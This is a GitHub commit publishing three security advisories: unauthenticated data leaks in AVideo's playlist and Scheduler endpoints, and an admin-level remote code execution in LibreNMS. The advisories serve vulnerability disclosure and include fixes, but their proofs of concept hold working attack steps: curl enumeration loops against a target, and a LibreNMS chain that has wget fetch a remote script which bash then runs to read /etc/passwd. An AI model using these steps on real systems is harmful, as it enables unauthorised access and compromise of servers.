Skip to content

Commit a51d63d

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-75qq-68m8-pvfr GHSA-j724-5c6c-68g5 GHSA-pr3g-phhr-h8fh
1 parent 6380847 commit a51d63d

3 files changed

Lines changed: 184 additions & 0 deletions

File tree

advisories/github-reviewed/2026/03/GHSA-75qq-68m8-pvfr/GHSA-75qq-68m8-pvfr.json

Lines changed: 62 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-75qq-68m8-pvfr",
4+
"modified": "2026-03-26T18:05:40Z",
5+
"published": "2026-03-26T18:05:40Z",
6+
"aliases": [
7+
"CVE-2026-33759"
8+
],
9+
"summary": "AVideo: Unauthenticated IDOR in playlistsVideos.json.php Exposes Private Playlist Contents",
10+
"details": "## Summary\n\nThe `objects/playlistsVideos.json.php` endpoint returns the full video contents of any playlist by ID without any authentication or authorization check. Private playlists (including `watch_later` and `favorite` types) are correctly hidden from listing endpoints via `playlistsFromUser.json.php`, but their contents are directly accessible through this endpoint by providing the sequential integer `playlists_id` parameter.\n\n## Details\n\nThe endpoint at `objects/playlistsVideos.json.php` accepts a `playlists_id` parameter and directly calls `PlayList::getVideosFromPlaylist()` with no ownership or visibility validation:\n\n```php\n// objects/playlistsVideos.json.php:24-28\nif (empty($_REQUEST['playlists_id'])) {\n die('Play List can not be empty');\n}\nrequire_once './playlist.php';\n$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);\n```\n\nThe `getVideosFromPlaylist()` method at `objects/playlist.php:588` performs a SQL query joining `playlists_has_videos`, `videos`, and `users` tables with no authorization filter:\n\n```php\n// objects/playlist.php:592-597\n$sql = \"SELECT v.*, p.*,v.created as cre, p.`order` as video_order \"\n . \" FROM playlists_has_videos p \"\n . \" LEFT JOIN videos as v ON videos_id = v.id \"\n . \" LEFT JOIN users u ON u.id = v.users_id \"\n . \" WHERE playlists_id = ? AND v.status != 'i' \";\n```\n\nIn contrast, the listing endpoint `playlistsFromUser.json.php` correctly enforces visibility at lines 23-27:\n\n```php\n// objects/playlistsFromUser.json.php:23-27\n$publicOnly = true;\nif (User::isLogged() && (User::getId() == $requestedUserId || User::isAdmin())) {\n $publicOnly = false;\n}\n$row = PlayList::getAllFromUser($requestedUserId, $publicOnly);\n```\n\nThis creates a bypass: even though private playlists are hidden from listing, their contents are fully exposed via the videos endpoint. Playlist IDs are sequential integers, making enumeration trivial. The `.htaccess` rewrite at line 356 maps the clean URL `playListsVideos.json` to this endpoint.\n\n## PoC\n\n**Step 1: Enumerate playlist contents without authentication**\n\n```bash\n# No cookies or auth headers needed. Increment playlists_id to enumerate.\ncurl -s \"http://TARGET/objects/playlistsVideos.json.php?playlists_id=1\" | python3 -m json.tool\n```\n\nExpected: Returns full video metadata array for playlist ID 1, including video titles, filenames, URLs, user info, comments, and subscriber counts.\n\n**Step 2: Enumerate private playlists (watch_later, favorite)**\n\n```bash\n# Iterate through sequential IDs to find private playlists\nfor i in $(seq 1 50); do\n result=$(curl -s \"http://TARGET/objects/playlistsVideos.json.php?playlists_id=$i\")\n count=$(echo \"$result\" | python3 -c \"import sys,json; print(len(json.load(sys.stdin)))\" 2>/dev/null)\n if [ \"$count\" != \"0\" ] && [ -n \"$count\" ]; then\n echo \"Playlist $i: $count videos\"\n fi\ndone\n```\n\n**Step 3: Confirm the listing endpoint correctly hides private playlists**\n\n```bash\n# This correctly returns only public playlists for user 1\ncurl -s \"http://TARGET/objects/playlistsFromUser.json.php?users_id=1\" | python3 -m json.tool\n# Compare: playlistsVideos.json.php returns contents of ALL playlists including private ones\n```\n\n## Impact\n\nAn unauthenticated attacker can:\n\n- **Enumerate all users' watch history** by accessing `watch_later` playlist contents\n- **Enumerate all users' favorites** by accessing `favorite` playlist contents\n- **Access unlisted/private custom playlists** that were intentionally hidden from public view\n- **Harvest video metadata** including filenames, URLs, user information, and comments for videos in private playlists\n\nThis is a privacy violation that exposes user viewing habits and content preferences. The sequential integer IDs make bulk enumeration straightforward.\n\n## Recommended Fix\n\nAdd authorization checks to `objects/playlistsVideos.json.php` before returning playlist contents:\n\n```php\n// objects/playlistsVideos.json.php — add after line 27, before getVideosFromPlaylist()\nrequire_once $global['systemRootPath'] . 'plugin/PlayLists/PlayLists.php';\n\n$pl = new PlayList($_REQUEST['playlists_id']);\n$plStatus = $pl->getStatus();\n\n// Public playlists are accessible to everyone\nif ($plStatus !== 'public') {\n // Private, unlisted, watch_later, and favorite playlists require ownership or admin\n if (!User::isLogged() || (User::getId() != $pl->getUsers_id() && !User::isAdmin())) {\n header('HTTP/1.1 403 Forbidden');\n die(json_encode(['error' => 'You do not have permission to view this playlist']));\n }\n}\n\n$videos = PlayList::getVideosFromPlaylist($_REQUEST['playlists_id']);\n```",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "wwbn/avideo"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"last_affected": "26.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-75qq-68m8-pvfr"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/WWBN/AVideo/commit/bb716fbece656c9fe39784f11e4e822b5867f1ca"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/WWBN/AVideo"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-639",
55+
"CWE-862"
56+
],
57+
"severity": "MODERATE",
58+
"github_reviewed": true,
59+
"github_reviewed_at": "2026-03-26T18:05:40Z",
60+
"nvd_published_at": null
61+
}
62+
}

advisories/github-reviewed/2026/03/GHSA-j724-5c6c-68g5/GHSA-j724-5c6c-68g5.json

Lines changed: 62 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,62 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-j724-5c6c-68g5",
4+
"modified": "2026-03-26T18:06:39Z",
5+
"published": "2026-03-26T18:06:39Z",
6+
"aliases": [
7+
"CVE-2026-33761"
8+
],
9+
"summary": "AVideo: Unauthenticated Access to Scheduler Plugin Endpoints Leaks Scheduled Tasks, Email Content, and User Mappings",
10+
"details": "## Summary\n\nThree `list.json.php` endpoints in the Scheduler plugin lack any authentication check, while every other endpoint in the same plugin directories (`add.json.php`, `delete.json.php`, `index.php`) requires `User::isAdmin()`. An unauthenticated attacker can retrieve all scheduled tasks (including internal callback URLs and parameters), admin-composed email messages, and user-to-email targeting mappings by sending simple GET requests.\n\n## Details\n\nThe vulnerable files are:\n\n**1. `plugin/Scheduler/View/Scheduler_commands/list.json.php:1-7`**\n```php\n<?php\nrequire_once '../../../../videos/configuration.php';\nrequire_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Scheduler_commands.php';\nheader('Content-Type: application/json');\n\n$rows = Scheduler_commands::getAll();\n?>\n{\"data\": <?php echo json_encode($rows); ?>}\n```\n\n**2. `plugin/Scheduler/View/Emails_messages/list.json.php:1-10`**\n```php\n<?php\nrequire_once '../../../../videos/configuration.php';\nrequire_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Emails_messages.php';\nheader('Content-Type: application/json');\n\n$rows = Emails_messages::getAll();\n$total = Emails_messages::getTotal();\n?>\n{\"data\": <?php echo json_encode($rows); ?>, ...}\n```\n\n**3. `plugin/Scheduler/View/Email_to_user/list.json.php:1-10`**\n```php\n<?php\nrequire_once '../../../../videos/configuration.php';\nrequire_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Email_to_user.php';\nheader('Content-Type: application/json');\n\n$rows = Email_to_user::getAll();\n$total = Email_to_user::getTotal();\n?>\n{\"data\": <?php echo json_encode($rows); ?>, ...}\n```\n\nNone of these files check authentication before calling `getAll()`, which executes `SELECT * FROM {table}` and returns the entire table contents.\n\nIn contrast, every sibling endpoint requires admin access. For example, `plugin/Scheduler/View/Scheduler_commands/add.json.php:12-15`:\n```php\nif(!User::isAdmin()){\n $obj->msg = \"You cant do this\";\n die(json_encode($obj));\n}\n```\n\nThe `Scheduler_commands` table (defined in `plugin/Scheduler/Objects/Scheduler_commands.php`) stores fields including `callbackURL` (internal server URLs with query parameters), `parameters` (JSON blobs containing user IDs and email configuration), `status`, `timezone`, and cron scheduling fields. The `Emails_messages` table stores `subject` and `message` (full HTML email bodies composed by admins). The `Email_to_user` table maps `users_id` to `emails_messages_id`, revealing which users are targeted by which email campaigns.\n\n## PoC\n\n```bash\n# 1. Retrieve all scheduled tasks — exposes internal callbackURLs and parameters\ncurl -s 'https://target/plugin/Scheduler/View/Scheduler_commands/list.json.php' | jq '.data[] | {id, callbackURL, parameters, status, type}'\n\n# 2. Retrieve all admin-composed email messages — exposes subject and HTML body\ncurl -s 'https://target/plugin/Scheduler/View/Emails_messages/list.json.php' | jq '.data[] | {id, subject, message}'\n\n# 3. Retrieve user-to-email targeting mappings — reveals which users receive which emails\ncurl -s 'https://target/plugin/Scheduler/View/Email_to_user/list.json.php' | jq '.data[] | {users_id, emails_messages_id, sent_at}'\n```\n\nAll three return full database contents with no authentication required. No session cookie or token is needed.\n\n## Impact\n\nAn unauthenticated attacker can:\n\n- **Enumerate internal infrastructure**: `callbackURL` fields expose internal server URLs and query parameters used by the scheduler, potentially revealing internal API endpoints and their parameter structures\n- **Read admin email campaigns**: Full email subjects and HTML message bodies composed by administrators are exposed\n- **Map user targeting**: The `Email_to_user` table reveals which `users_id` values are targeted by which email campaigns, enabling user enumeration and profiling\n- **Gather reconnaissance**: Scheduling configuration (cron fields, execution status, timezone) reveals operational patterns and timing of automated tasks\n\nThe information disclosed could be used to facilitate further attacks (e.g., using discovered internal URLs for SSRF, or user IDs for targeted account attacks).\n\n## Recommended Fix\n\nAdd `User::isAdmin()` checks to all three `list.json.php` files, matching the pattern used by sibling endpoints. For each file, add the following after the `require_once` lines and before the data retrieval:\n\n**`plugin/Scheduler/View/Scheduler_commands/list.json.php`:**\n```php\n<?php\nrequire_once '../../../../videos/configuration.php';\nrequire_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Scheduler_commands.php';\nheader('Content-Type: application/json');\n\nif(!User::isAdmin()){\n die(json_encode(['error' => true, 'msg' => 'Not authorized']));\n}\n\n$rows = Scheduler_commands::getAll();\n?>\n{\"data\": <?php echo json_encode($rows); ?>}\n```\n\nApply the same pattern to `Emails_messages/list.json.php` and `Email_to_user/list.json.php`.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "wwbn/avideo"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"last_affected": "26.0"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-j724-5c6c-68g5"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/WWBN/AVideo/commit/83390ab1fa8dca2de3f8fa76116a126428405431"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/WWBN/AVideo"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-200",
55+
"CWE-862"
56+
],
57+
"severity": "MODERATE",
58+
"github_reviewed": true,
59+
"github_reviewed_at": "2026-03-26T18:06:39Z",
60+
"nvd_published_at": null
61+
}
62+
}

advisories/github-reviewed/2026/03/GHSA-pr3g-phhr-h8fh/GHSA-pr3g-phhr-h8fh.json

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-pr3g-phhr-h8fh",
4+
"modified": "2026-03-26T18:04:01Z",
5+
"published": "2026-03-26T18:04:01Z",
6+
"aliases": [],
7+
"summary": "LibreNMS is Vulnerable to Remote Code Execution by Arbitrary File Write",
8+
"details": "### Summary\nA vulnerability has been identified that allows an authenticated administrator to execute arbitrary code on the host server. By modifying the binary path settings for built-in network tools and bypassing an input filter, an attacker with administrative privileges can download and execute malicious payloads.\n\n### Details\nThe application allows administrative users to configure the absolute binary paths for network diagnostic tools at `/settings/external/binaries`. This setting does not sufficiently validate ensuring the paths remain restricted to safe, intended executables. These tools are invoked by sending a request to the `GET /ajax/netcmd` endpoint. While there is an existing input filter designed to restrict arguments to valid IP addresses or hostnames, this filter can be bypassed.\n\n### PoC\nTo reproduce this vulnerability, a remote HTTP server should be hosted with a malicious script/executable, ensure the remote server is reachable by the server running LibreNMS. The PoC will use the file `malicious.sh` containing the following content. It will return the content of /etc/passwd and /etc/group, current working directory, username that is running the script, and it will list files of the current directory.\n\n```bash\n#!/usr/bin/env bash\n\ncat /etc/passwd\ncat /etc/group\nwhoami\npwd\nls\n```\n\n1. Host a remote HTTP server that the server can reach and place the malicious script on the remote server. For demonstration, I will start it on localhost.\n<img width=\"593\" height=\"481\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ef235f8e-089b-462c-b12c-7b5ae2037fc5\" />\n\n2. Make sure the malicious script `malicious.sh` can be downloaded. \n<img width=\"516\" height=\"100\" alt=\"image\" src=\"https://github.com/user-attachments/assets/60b04755-e824-4384-81f2-2feacdc8e273\" />\n\n3. Login with an admin account and navigate to Global Settings -> External -> Binary Locations\n<img width=\"797\" height=\"201\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f914cc9e-f45b-444f-8f16-058101d84576\" />\n\n4. Change the whois binary path to the path of wget (e.g. /usr/bin/wget).\n<img width=\"478\" height=\"58\" alt=\"image\" src=\"https://github.com/user-attachments/assets/57fbf033-ff07-41dc-9bac-2f3b3e897ea6\" />\n\n5. Send the request `GET /ajax/netcmd?cmd=whois&query={remote http server's ip address}/malicious.sh`. The response should contain wget's output, and malicious.sh would be downloaded by the server.\n<img width=\"900\" height=\"209\" alt=\"image\" src=\"https://github.com/user-attachments/assets/942b6082-18db-4838-b06c-b98d7fa1f8d0\" />\n\n6. After that, change the whois binary path to the path of bash (e.g. /bin/bash). \n<img width=\"751\" height=\"56\" alt=\"image\" src=\"https://github.com/user-attachments/assets/0c11d86e-0dab-4780-bdb7-f328bbb758f8\" />\n\n7. Send the request GET /ajax/netcmd?cmd=whois&query=malicious.sh to execute the script. \n<img width=\"846\" height=\"688\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d4dcf8e9-5a75-407c-8dd4-96d11f090dbe\" />\n\n### Impact\nThis vulnerability allows a malicious actor to achieve Remote Code Execution (RCE), potentially leading to complete system compromise, data exfiltration, or lateral movement within the network.\n\n### Remediation Advice\nLoading Binary Path from a config file instead of exposing settings in WebUI can eliminate this issue. If it is not possible, enforcing more validations and fix the `ip_or_hostname` bypass in https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169 to reduce the risk of RCE.\n\n### Prerequisite\nThe attacker must have a valid Administrator account to exploit this vulnerability.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Packagist",
19+
"name": "librenms/librenms"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "1.48"
27+
},
28+
{
29+
"fixed": "26.3.0"
30+
}
31+
]
32+
}
33+
]
34+
}
35+
],
36+
"references": [
37+
{
38+
"type": "WEB",
39+
"url": "https://github.com/librenms/librenms/security/advisories/GHSA-pr3g-phhr-h8fh"
40+
},
41+
{
42+
"type": "PACKAGE",
43+
"url": "https://github.com/librenms/librenms"
44+
},
45+
{
46+
"type": "WEB",
47+
"url": "https://github.com/librenms/librenms/blob/master/app/Providers/AppServiceProvider.php#L169"
48+
}
49+
],
50+
"database_specific": {
51+
"cwe_ids": [
52+
"CWE-78",
53+
"CWE-79"
54+
],
55+
"severity": "HIGH",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-03-26T18:04:01Z",
58+
"nvd_published_at": null
59+
}
60+
}

0 commit comments

Comments
 (0)